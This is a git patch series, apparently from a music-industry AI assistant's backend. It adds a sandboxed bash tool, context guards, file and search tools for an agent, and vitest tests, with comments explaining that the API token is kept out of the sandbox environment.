+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("getSandbox", () => {
+  it("reconnects via connectVercel(state) and returns the sandbox", async () => {
+    const fakeSandbox = { workingDirectory: "/sandbox/mono" };
+    vi.mocked(connectVercel).mockResolvedValue(fakeSandbox as never);
+    const state = { sandboxName: "session-xyz" };
+    const result = await getSandbox(
+      { sandbox: { state, workingDirectory: "/sandbox/mono" } },
+      "bash",
+    );
+    expect(result).toBe(fakeSandbox);
+    expect(connectVercel).toHaveBeenCalledWith(state);
+  });
+
+  it("throws a descriptive error when context is missing entirely", async () => {
+    await expect(getSandbox(undefined, "bash")).rejects.toThrow(/Sandbox state missing/);
+  });
+
+  it("throws when sandbox.state is missing", async () => {
+    await expect(
+      getSandbox({ sandbox: { workingDirectory: "/x" } } as never, "bash"),
+    ).rejects.toThrow(/Sandbox state missing/);
+  });
+
+  it("throws when sandbox.workingDirectory is empty (tightened guard)", async () => {
+    await expect(
+      getSandbox({ sandbox: { state: {}, workingDirectory: "" } } as never, "bash"),
+    ).rejects.toThrow(/Sandbox state missing/);
+  });
+});
diff --git a/lib/agent/tools/__tests__/isAgentContext.test.ts b/lib/agent/tools/__tests__/isAgentContext.test.ts
new file mode 100644
index 000000000..29ad4f29d
--- /dev/null
+++ b/lib/agent/tools/__tests__/isAgentContext.test.ts
@@ -0,0 +1,42 @@
+import { describe, it, expect } from "vitest";
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+
+describe("isAgentContext", () => {
+  it("returns true for a well-formed context", () => {
+    expect(
+      isAgentContext({
+        sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" },
+      }),
+    ).toBe(true);
+  });
+
+  it("returns false for non-object inputs", () => {
+    expect(isAgentContext(undefined)).toBe(false);
+    expect(isAgentContext(null)).toBe(false);
+    expect(isAgentContext("nope")).toBe(false);
+    expect(isAgentContext(42)).toBe(false);
+  });
+
+  it("returns false when sandbox is missing", () => {
+    expect(isAgentContext({})).toBe(false);
+  });
+
+  it("returns false when sandbox is null", () => {
+    expect(isAgentContext({ sandbox: null })).toBe(false);
+  });
+
+  it("returns false when sandbox is empty (missing state and workingDirectory)", () => {
+    expect(isAgentContext({ sandbox: {} })).toBe(false);
+  });
+
+  it("returns false when sandbox.state is missing or null", () => {
+    expect(isAgentContext({ sandbox: { workingDirectory: "/x" } })).toBe(false);
+    expect(isAgentContext({ sandbox: { state: null, workingDirectory: "/x" } })).toBe(false);
+  });
+
+  it("returns false when sandbox.workingDirectory is missing, non-string, or empty", () => {
+    expect(isAgentContext({ sandbox: { state: {} } })).toBe(false);
+    expect(isAgentContext({ sandbox: { state: {}, workingDirectory: 42 } })).toBe(false);
+    expect(isAgentContext({ sandbox: { state: {}, workingDirectory: "" } })).toBe(false);
+  });
+});
diff --git a/lib/agent/tools/bashTool.ts b/lib/agent/tools/bashTool.ts
new file mode 100644
index 000000000..908113812
--- /dev/null
+++ b/lib/agent/tools/bashTool.ts
@@ -0,0 +1,116 @@
+import { tool } from "ai";
+import { z } from "zod";
+import * as path from "path";
+import { buildRecoupExecEnv } from "@/lib/agent/tools/buildRecoupExecEnv";
+import { getSandbox } from "@/lib/agent/tools/getSandbox";
+
+const TIMEOUT_MS = 120_000;
+
+const bashInputSchema = z.object({
+  command: z.string().describe("The bash command to execute"),
+  cwd: z
+    .string()
+    .optional()
+    .describe("Workspace-relative working directory for the command (e.g., apps/web)"),
+  detached: z
+    .boolean()
+    .optional()
+    .describe(
+      "Use this whenever you want to run a persistent server in the background (e.g., npm run dev, next dev). The command starts and returns immediately without waiting for it to finish.",
+    ),
+});
+
+/**
+ * Factory for the `bash` sandbox tool. Runs `bash -c "<command>"` inside
+ * the agent's sandbox via `sandbox.exec`, defaulting cwd to the sandbox's
+ * working directory.
+ *
+ * Approval gating is intentionally absent — model-issued commands are
+ * trusted in this PR. Add a host-side gate at the route/UI layer if that
+ * changes.
+ *
+ * Foreground execs receive `RECOUP_ORG_ID` from agent context (when the
+ * sandbox is org-scoped) so future `recoup-api` skill calls can scope to
+ * the right org. Detached execs deliberately skip env injection — those
+ * processes outlive the prompt.
+ */
+export const bashTool = () =>
+  tool({
+    description: `Execute a bash command in the user's shell (non-interactive).
+
+WHEN TO USE:
+- Running existing project commands (build, test, lint, typecheck)
+- Using read-only CLI tools (git status, git diff, ls, etc.)
+- Invoking language/package managers (npm, pnpm, yarn, pip, go, etc.) as part of the task
+
+WHEN NOT TO USE:
+- Reading files (use the file read tool instead, once available)
+- Editing or creating files (use file edit/write tools, once available)
+- Searching code or text (use grep / glob tools, once available)
+- Interactive commands (shells, editors, REPLs)
+
+USAGE:
+- Runs bash -c "<command>" in a non-interactive shell (no TTY/PTY)
+- Commands run in the sandbox working directory by default — do NOT prepend "cd /path &&"
+- Use the cwd parameter ONLY with a workspace-relative subdirectory
+- Commands automatically timeout after ~2 minutes
+- Combined stdout/stderr output is truncated after ~50,000 characters
+
+IMPORTANT:
+- Never chain commands with ';' or '&&' — use separate tool calls
+- Never use interactive commands (vim, nano, top, bash, ssh, etc.)
+- Always quote file paths that may contain spaces
+- Use detached: true to start dev servers / long-running processes in the background`,
+    inputSchema: bashInputSchema,
+    execute: async ({ command, cwd, detached }, { experimental_context, abortSignal }) => {
+      const sandbox = await getSandbox(experimental_context, "bash");
+      const workingDirectory = sandbox.workingDirectory;
+      const workingDir = cwd
+        ? path.isAbsolute(cwd)
+          ? cwd
+          : path.resolve(workingDirectory, cwd)
+        : workingDirectory;
+
+      if (detached) {
+        if (!sandbox.execDetached) {
+          return {
+            success: false,
+            exitCode: null,
+            stdout: "",
+            stderr:
+              "Detached mode is not supported in this sandbox environment. Only cloud sandboxes support background processes.",
+          };
+        }
+        try {
+          const { commandId } = await sandbox.execDetached(command, workingDir);
+          return {
+            success: true,
+            exitCode: null,
+            stdout: `Process started in background (command ID: ${commandId}). The server is now running.`,
+            stderr: "",
+          };
+        } catch (error) {
+          return {
+            success: false,
+            exitCode: null,
+            stdout: "",
+            stderr: error instanceof Error ? error.message : String(error),
+          };
+        }
+      }
+
+      const recoupEnv = buildRecoupExecEnv(experimental_context);
+      const result = await sandbox.exec(command, workingDir, TIMEOUT_MS, {
+        signal: abortSignal,
+        ...(recoupEnv ? { env: recoupEnv } : {}),
+      });
+
+      return {
+        success: result.success,
+        exitCode: result.exitCode,
+        stdout: result.stdout,
+        stderr: result.stderr,
+        ...(result.truncated && { truncated: true }),
+      };
+    },
+  });
diff --git a/lib/agent/tools/buildRecoupExecEnv.ts b/lib/agent/tools/buildRecoupExecEnv.ts
new file mode 100644
index 000000000..6eaf3015f
--- /dev/null
+++ b/lib/agent/tools/buildRecoupExecEnv.ts
@@ -0,0 +1,30 @@
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+
+/**
+ * Build a per-invocation env override carrying Recoupable sandbox context
+ * so outbound shell commands (curl, scripts, the `recoup-api` skill) can
+ * scope requests correctly without any state persisting on the sandbox.
+ *
+ * Currently injects only `RECOUP_ORG_ID` — a public identifier. Auth-token
+ * injection is deliberately NOT included here; a long-lived api key in the
+ * sandbox env would be readable by any model-issued bash command. Proper
+ * short-lived token minting will land alongside the `skill` tool port
+ * (when there's an actual consumer for it).
+ *
+ * Returns `undefined` when nothing is available to inject so callers can
+ * cleanly spread a conditional `...(env ? { env } : {})` into exec opts.
+ *
+ * @param experimental_context - The opaque context object passed by AI SDK to tool execute.
+ */
+export function buildRecoupExecEnv(
+  experimental_context: unknown,
+): Record<string, string> | undefined {
+  if (!isAgentContext(experimental_context)) return undefined;
+
+  const env: Record<string, string> = {};
+  if (experimental_context.recoupOrgId) {
+    env.RECOUP_ORG_ID = experimental_context.recoupOrgId;
+  }
+
+  return Object.keys(env).length > 0 ? env : undefined;
+}
diff --git a/lib/agent/tools/getSandbox.ts b/lib/agent/tools/getSandbox.ts
new file mode 100644
index 000000000..be6c46605
--- /dev/null
+++ b/lib/agent/tools/getSandbox.ts
@@ -0,0 +1,28 @@
+import type { Sandbox } from "@/lib/sandbox/interface";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+import { isAgentContext } from "@/lib/agent/tools/isAgentContext";
+
+/**
+ * Resolve a connected `Sandbox` instance from `experimental_context`.
+ * Reconnects each call via `connectVercel(state)` rather than caching the
+ * handle on context — workflow durability requires that side-effecting
+ * resources (sandbox sessions) be re-acquired inside the step that uses
+ * them, not passed across event boundaries.
+ *
+ * @param experimental_context - The opaque context object passed by AI SDK to tool execute.
+ * @param toolName - Optional tool name to surface in error messages.
+ */
+export async function getSandbox(
+  experimental_context: unknown,
+  toolName?: string,
+): Promise<Sandbox> {
+  if (!isAgentContext(experimental_context)) {
+    const where = toolName ? ` (tool: ${toolName})` : "";
+    throw new Error(
+      `Sandbox state missing from agent context${where}. ` +
+        "Ensure the workflow start payload includes `sandbox.state` and that " +
+        "runAgentStep threads it via experimental_context.",
+    );
+  }
+  return connectVercel(experimental_context.sandbox.state);
+}
diff --git a/lib/agent/tools/isAgentContext.ts b/lib/agent/tools/isAgentContext.ts
new file mode 100644
index 000000000..0049ac010
--- /dev/null
+++ b/lib/agent/tools/isAgentContext.ts
@@ -0,0 +1,26 @@
+import type { AgentContext } from "@/lib/agent/tools/AgentContext";
+
+/**
+ * Type-guard that confirms an arbitrary `experimental_context` shape has
+ * the AgentContext fields tools rely on at runtime. Validates each required
+ * leaf (sandbox object, state object, non-empty workingDirectory) so callers
+ * can trust the narrowed type — earlier weaker guards returned true for
+ * `{ sandbox: null }` or `{ sandbox: {} }`, letting tools later crash on
+ * "cannot read .x of undefined".
+ *
+ * @param value - The opaque context object passed by AI SDK to tool execute.
+ */
+export function isAgentContext(value: unknown): value is AgentContext {
+  if (typeof value !== "object" || value === null) return false;
+
+  const candidate = value as { sandbox?: unknown };
+  const sandbox = candidate.sandbox;
+  if (typeof sandbox !== "object" || sandbox === null) return false;
+
+  const sandboxFields = sandbox as { state?: unknown; workingDirectory?: unknown };
+  if (typeof sandboxFields.state !== "object" || sandboxFields.state === null) return false;
+  if (typeof sandboxFields.workingDirectory !== "string") return false;
+  if (sandboxFields.workingDirectory.length === 0) return false;
+
+  return true;
+}
diff --git a/lib/agents/generalAgent/getGeneralAgent.ts b/lib/agents/generalAgent/getGeneralAgent.ts
index 7c2c9407b..e4bc4fc56 100644
--- a/lib/agents/generalAgent/getGeneralAgent.ts
+++ b/lib/agents/generalAgent/getGeneralAgent.ts
@@ -1,4 +1,5 @@
-import { stepCountIs, ToolLoopAgent } from "ai";
+import { ToolLoopAgent } from "ai";
+import { CHAT_AGENT_STOP_WHEN } from "@/lib/chat/const";
 import { AnthropicProviderOptions } from "@ai-sdk/anthropic";
 import { GoogleGenerativeAIProviderOptions } from "@ai-sdk/google";
 import { OpenAIResponsesProviderOptions } from "@ai-sdk/openai";
@@ -52,7 +53,7 @@ export default async function getGeneralAgent(body: ChatRequestBody): Promise<Ro
 
   const tools = await setupToolsForRequest(body);
   const model = bodyModel || DEFAULT_MODEL;
-  const stopWhen = stepCountIs(111);
+  const stopWhen = CHAT_AGENT_STOP_WHEN;
 
   const agent = new ToolLoopAgent({
     model,
diff --git a/lib/chat/const.ts b/lib/chat/const.ts
index 0ff8cbd2b..54daa63d4 100644
--- a/lib/chat/const.ts
+++ b/lib/chat/const.ts
@@ -1,5 +1,18 @@
+import { stepCountIs } from "ai";
+
 export const MAX_MESSAGES = 55;
 
+/**
+ * Stop condition for multi-step chat agent loops (model → tool → model → …).
+ * Used by /api/chat (via getGeneralAgent) and /api/chat/workflow (via
+ * runAgentStep). 111 is high enough that normal flows never hit the cap
+ * but bounds runaway loops for cost / replay safety.
+ *
+ * Single-shot agents (compact, content, email-reply) use `stepCountIs(1)`
+ * directly — they're not in the multi-step family.
+ */
+export const CHAT_AGENT_STOP_WHEN = stepCountIs(111);
+
 export const SYSTEM_PROMPT = `You are Recoup, a friendly, sharp, and strategic AI assistant for the music industry. You help music executives, artist teams, and self-starting artists analyze fan data, optimize marketing, and grow artist careers.
 
 ---
diff --git a/lib/chat/handleChatWorkflowStream.ts b/lib/chat/handleChatWorkflowStream.ts
index dcaad8585..6ceb0c867 100644
--- a/lib/chat/handleChatWorkflowStream.ts
+++ b/lib/chat/handleChatWorkflowStream.ts
@@ -13,6 +13,9 @@ import { persistLatestUserMessage } from "@/lib/chat/persistLatestUserMessage";
 import { errorResponse } from "@/lib/networking/errorResponse";
 import { getCorsHeaders } from "@/lib/networking/getCorsHeaders";
 import { runAgentWorkflow } from "@/app/lib/workflows/runAgentWorkflow";
+import { extractOrgId } from "@/lib/recoupable/extractOrgId";
+import { DEFAULT_WORKING_DIRECTORY } from "@/lib/sandbox/vercel/sandbox/constants";
+import type { VercelState } from "@/lib/sandbox/vercel/state";
 import generateUUID from "@/lib/uuid/generateUUID";
 
 const DEFAULT_MODEL_ID = "anthropic/claude-haiku-4.5";
@@ -84,12 +87,29 @@ export async function handleChatWorkflowStream(request: NextRequest): Promise<Re
   void persistLatestUserMessage(validated.chatId, validated.messages as never);
 
   const modelId = chat.model_id ?? DEFAULT_MODEL_ID;
+  const recoupOrgId = session.clone_url
+    ? (extractOrgId(session.clone_url) ?? undefined)
+    : undefined;
   const run = await start(runAgentWorkflow, [
     {
       messages: validated.messages,
       chatId: validated.chatId,
       sessionId: validated.sessionId,
       modelId,
+      agentContext: {
+        sandbox: {
+          state: session.sandbox_state as VercelState,
+          // Slim PR 4 ships the default working directory. Per-session
+          // overrides land when createChatRuntime is ported alongside
+          // the rest of the tool surface.
+          workingDirectory: DEFAULT_WORKING_DIRECTORY,
+        },
+        recoupOrgId,
+        // No `recoupAccessToken`: handing the long-lived api key to bash
+        // would let any model-issued command exfiltrate it via env. Proper
+        // short-lived token minting lands alongside the `skill` tool port
+        // (when there's an actual consumer for it).
+      },
     },
   ]);
 

From 51fd649945376a0d0cc4a87a3c172ae91f528d0e Mon Sep 17 00:00:00 2001
From: "sweetman.eth" <sweetmantech@gmail.com>
Date: Thu, 21 May 2026 13:49:12 -0500
Subject: [PATCH 4/5] =?UTF-8?q?feat(chat-workflow):=20port=207=20leaf=20sa?=
 =?UTF-8?q?ndbox=20tools=20=E2=80=94=20read/write/edit/grep=E2=80=A6=20(#5?=
 =?UTF-8?q?85)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
---
 lib/agent/__tests__/buildAgentTools.test.ts   |  34 +++-
 lib/agent/buildAgentTools.ts                  |  29 ++-
 lib/agent/tools/__tests__/bashTool.test.ts    |  14 +-
 .../tools/__tests__/editFileTool.test.ts      |  86 +++++++++
 lib/agent/tools/__tests__/globTool.test.ts    |  97 ++++++++++
 lib/agent/tools/__tests__/grepTool.test.ts    | 103 +++++++++++
 .../tools/__tests__/readFileTool.test.ts      |  89 ++++++++++
 lib/agent/tools/__tests__/shellEscape.test.ts |  20 +++
 .../tools/__tests__/toDisplayPath.test.ts     |  29 +++
 .../tools/__tests__/todoWriteTool.test.ts     |  28 +++
 .../tools/__tests__/webFetchTool.test.ts      |  96 ++++++++++
 .../tools/__tests__/writeFileTool.test.ts     |  52 ++++++
 lib/agent/tools/bashTool.ts                   | 109 ++++++------
 lib/agent/tools/editFileTool.ts               | 100 +++++++++++
 lib/agent/tools/globTool.ts                   | 165 ++++++++++++++++++
 lib/agent/tools/grepTool.ts                   | 143 +++++++++++++++
 lib/agent/tools/readFileTool.ts               |  70 ++++++++
 lib/agent/tools/shellEscape.ts                |  14 ++
 lib/agent/tools/toDisplayPath.ts              |  34 ++++
 lib/agent/tools/todoWriteTool.ts              |  65 +++++++
 lib/agent/tools/webFetchTool.ts               | 124 +++++++++++++
 lib/agent/tools/writeFileTool.ts              |  65 +++++++
 22 files changed, 1491 insertions(+), 75 deletions(-)
 create mode 100644 lib/agent/tools/__tests__/editFileTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/globTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/grepTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/readFileTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/shellEscape.test.ts
 create mode 100644 lib/agent/tools/__tests__/toDisplayPath.test.ts
 create mode 100644 lib/agent/tools/__tests__/todoWriteTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/webFetchTool.test.ts
 create mode 100644 lib/agent/tools/__tests__/writeFileTool.test.ts
 create mode 100644 lib/agent/tools/editFileTool.ts
 create mode 100644 lib/agent/tools/globTool.ts
 create mode 100644 lib/agent/tools/grepTool.ts
 create mode 100644 lib/agent/tools/readFileTool.ts
 create mode 100644 lib/agent/tools/shellEscape.ts
 create mode 100644 lib/agent/tools/toDisplayPath.ts
 create mode 100644 lib/agent/tools/todoWriteTool.ts
 create mode 100644 lib/agent/tools/webFetchTool.ts
 create mode 100644 lib/agent/tools/writeFileTool.ts

diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts
index 52479cad0..5478c59ca 100644
--- a/lib/agent/__tests__/buildAgentTools.test.ts
+++ b/lib/agent/__tests__/buildAgentTools.test.ts
@@ -1,17 +1,35 @@
 import { describe, it, expect } from "vitest";
 import { buildAgentTools } from "@/lib/agent/buildAgentTools";
 
+const EXPECTED_TOOL_NAMES = [
+  "bash",
+  "read",
+  "write",
+  "edit",
+  "grep",
+  "glob",
+  "todo_write",
+  "web_fetch",
+] as const;
+
 describe("buildAgentTools", () => {
-  it("returns a tools record keyed by tool name", () => {
+  it("returns a tools record with all 8 leaf tools registered", () => {
     const tools = buildAgentTools();
-    expect(tools).toHaveProperty("bash");
-    expect(typeof tools.bash).toBe("object");
+    for (const name of EXPECTED_TOOL_NAMES) {
+      expect(tools).toHaveProperty(name);
+    }
   });
 
-  it("each tool has an inputSchema, description, and execute", () => {
-    const tools = buildAgentTools();
-    expect(tools.bash.inputSchema).toBeDefined();
-    expect(tools.bash.description).toBeDefined();
-    expect(typeof tools.bash.execute).toBe("function");
+  it("each tool exposes the AI SDK shape (description + inputSchema + execute)", () => {
+    const tools = buildAgentTools() as Record<
+      string,
+      { description?: unknown; inputSchema?: unknown; execute?: unknown }
+    >;
+    for (const name of EXPECTED_TOOL_NAMES) {
+      const t = tools[name]!;
+      expect(typeof t.description).toBe("string");
+      expect(t.inputSchema).toBeDefined();
+      expect(typeof t.execute).toBe("function");
+    }
   });
 });
diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts
index be6bde085..f9cbc2b39 100644
--- a/lib/agent/buildAgentTools.ts
+++ b/lib/agent/buildAgentTools.ts
@@ -1,4 +1,11 @@
 import { bashTool } from "@/lib/agent/tools/bashTool";
+import { readFileTool } from "@/lib/agent/tools/readFileTool";
+import { writeFileTool } from "@/lib/agent/tools/writeFileTool";
+import { editFileTool } from "@/lib/agent/tools/editFileTool";
+import { grepTool } from "@/lib/agent/tools/grepTool";
+import { globTool } from "@/lib/agent/tools/globTool";
+import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool";
+import { webFetchTool } from "@/lib/agent/tools/webFetchTool";
 
 /**
  * Factory for the full agent tool set passed into `streamText({ tools })`.
@@ -6,14 +13,26 @@ import { bashTool } from "@/lib/agent/tools/bashTool";
  * at execute time — the factory takes no arguments because the tools are
  * stateless modulo that context.
  *
- * Slim PR 4 exposes only `bash`. The remaining sandbox tools (`read`,
- * `write`, `grep`, `glob`, `todo`, `task`, `ask_user_question`, `skill`,
- * `fetch`) port in follow-up PRs and slot into this record one-by-one
- * without changing the factory signature.
+ * Currently ships 8 leaf tools:
+ *   - bash, read, write, edit, grep, glob (sandbox / file ops)
+ *   - todo_write (planning surface; stateless, echoes the list back)
+ *   - web_fetch (HTTP via curl inside the sandbox)
+ *
+ * Composite tools (`task` subagent, `ask_user_question` UI part,
+ * `skill` skill discovery) port in a follow-up PR — they require
+ * subagent context plumbing / UI rendering / skill discovery infra
+ * that isn't in api today.
  */
 export function buildAgentTools() {
   return {
-    bash: bashTool(),
+    bash: bashTool,
+    read: readFileTool,
+    write: writeFileTool,
+    edit: editFileTool,
+    grep: grepTool,
+    glob: globTool,
+    todo_write: todoWriteTool,
+    web_fetch: webFetchTool,
   };
 }
 
diff --git a/lib/agent/tools/__tests__/bashTool.test.ts b/lib/agent/tools/__tests__/bashTool.test.ts
index da9a999d3..568a7f72d 100644
--- a/lib/agent/tools/__tests__/bashTool.test.ts
+++ b/lib/agent/tools/__tests__/bashTool.test.ts
@@ -34,7 +34,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     const result = await tool.execute!({ command: "ls" }, {
       experimental_context: baseContext,
     } as never);
@@ -64,7 +64,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     const result = (await tool.execute!({ command: "find ." }, {
       experimental_context: baseContext,
     } as never)) as { truncated?: boolean };
@@ -83,7 +83,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     await tool.execute!({ command: "ls", cwd: "apps/web" }, {
       experimental_context: baseContext,
     } as never);
@@ -107,7 +107,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     await tool.execute!({ command: "curl example.com" }, {
       experimental_context: { ...baseContext, recoupOrgId: "org-uuid" },
     } as never);
@@ -121,7 +121,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     const result = (await tool.execute!({ command: "npm run dev", detached: true }, {
       experimental_context: baseContext,
     } as never)) as { success: boolean; stdout: string };
@@ -134,7 +134,7 @@ describe("bashTool.execute", () => {
     const sandbox = makeSandbox({ execDetached: undefined });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     const result = (await tool.execute!({ command: "npm run dev", detached: true }, {
       experimental_context: baseContext,
     } as never)) as { success: boolean; stderr: string };
@@ -148,7 +148,7 @@ describe("bashTool.execute", () => {
     });
     vi.mocked(connectVercel).mockResolvedValue(sandbox as never);
 
-    const tool = bashTool();
+    const tool = bashTool;
     await tool.execute!({ command: "npm run dev", detached: true }, {
       experimental_context: { ...baseContext, recoupOrgId: "org-uuid" },
     } as never);
diff --git a/lib/agent/tools/__tests__/editFileTool.test.ts b/lib/agent/tools/__tests__/editFileTool.test.ts
new file mode 100644
index 000000000..3a2cac81d
--- /dev/null
+++ b/lib/agent/tools/__tests__/editFileTool.test.ts
@@ -0,0 +1,86 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { editFileTool } from "@/lib/agent/tools/editFileTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } };
+
+function makeSandbox(initialContent: string) {
+  let stored = initialContent;
+  return {
+    workingDirectory: "/sandbox/mono",
+    readFile: vi.fn(async () => stored),
+    writeFile: vi.fn(async (_path: string, content: string) => {
+      stored = content;
+    }),
+    getStored: () => stored,
+  };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("editFileTool", () => {
+  it("replaces a unique oldString once and reports the startLine", async () => {
+    const sb = makeSandbox("line one\nold value\nline three");
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = editFileTool;
+    const result = (await tool.execute!(
+      { filePath: "a.txt", oldString: "old value", newString: "new value" },
+      { experimental_context: ctx } as never,
+    )) as { success: boolean; replacements: number; startLine: number };
+    expect(result.success).toBe(true);
+    expect(result.replacements).toBe(1);
+    expect(result.startLine).toBe(2);
+    expect(sb.getStored()).toBe("line one\nnew value\nline three");
+  });
+
+  it("rejects when oldString === newString (no-op)", async () => {
+    const sb = makeSandbox("anything");
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = editFileTool;
+    const result = (await tool.execute!({ filePath: "a.txt", oldString: "x", newString: "x" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/must be different/);
+  });
+
+  it("rejects when oldString is not in the file", async () => {
+    const sb = makeSandbox("hello world");
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = editFileTool;
+    const result = (await tool.execute!(
+      { filePath: "a.txt", oldString: "missing", newString: "other" },
+      { experimental_context: ctx } as never,
+    )) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/not found/);
+  });
+
+  it("rejects ambiguous edits (multiple matches without replaceAll)", async () => {
+    const sb = makeSandbox("foo\nfoo\nbar");
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = editFileTool;
+    const result = (await tool.execute!({ filePath: "a.txt", oldString: "foo", newString: "baz" }, {
+      experimental_context: ctx,
+    } as never)) as { success: boolean; error: string };
+    expect(result.success).toBe(false);
+    expect(result.error).toMatch(/2 times/);
+  });
+
+  it("replaces all occurrences when replaceAll:true", async () => {
+    const sb = makeSandbox("foo bar foo baz foo");
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = editFileTool;
+    const result = (await tool.execute!(
+      { filePath: "a.txt", oldString: "foo", newString: "qux", replaceAll: true },
+      { experimental_context: ctx } as never,
+    )) as { success: boolean; replacements: number };
+    expect(result.success).toBe(true);
+    expect(result.replacements).toBe(3);
+    expect(sb.getStored()).toBe("qux bar qux baz qux");
+  });
+});
diff --git a/lib/agent/tools/__tests__/globTool.test.ts b/lib/agent/tools/__tests__/globTool.test.ts
new file mode 100644
index 000000000..3f35d0a71
--- /dev/null
+++ b/lib/agent/tools/__tests__/globTool.test.ts
@@ -0,0 +1,97 @@
+import { describe, it, expect, vi, beforeEach } from "vitest";
+import { globTool } from "@/lib/agent/tools/globTool";
+import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel";
+
+vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({
+  connectVercel: vi.fn(),
+}));
+
+const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } };
+
+function makeSandbox(exec: ReturnType<typeof vi.fn>) {
+  return { workingDirectory: "/sandbox/mono", exec };
+}
+
+beforeEach(() => vi.clearAllMocks());
+
+describe("globTool", () => {
+  it("parses `mtime\\tsize\\tpath` output into structured file entries", async () => {
+    // Two files, newest first (sort already happens server-side in the command).
+    const sb = makeSandbox(
+      vi.fn().mockResolvedValue({
+        success: true,
+        exitCode: 0,
+        stdout:
+          "1700000000.0\t512\t/sandbox/mono/src/index.ts\n1699999000.5\t256\t/sandbox/mono/src/util.ts",
+        stderr: "",
+        truncated: false,
+      }),
+    );
+    vi.mocked(connectVercel).mockResolvedValue(sb as never);
+    const tool = globTool;
+    const result = (await tool.execute!({ pattern: "**/*.ts" }, {
+      experimental_context: ctx,
+    } as never)) as {
+      success: boolean;
+      count: number;
+      files: Array<{ path: string; size: number; modifiedAt: string }>;
+    };
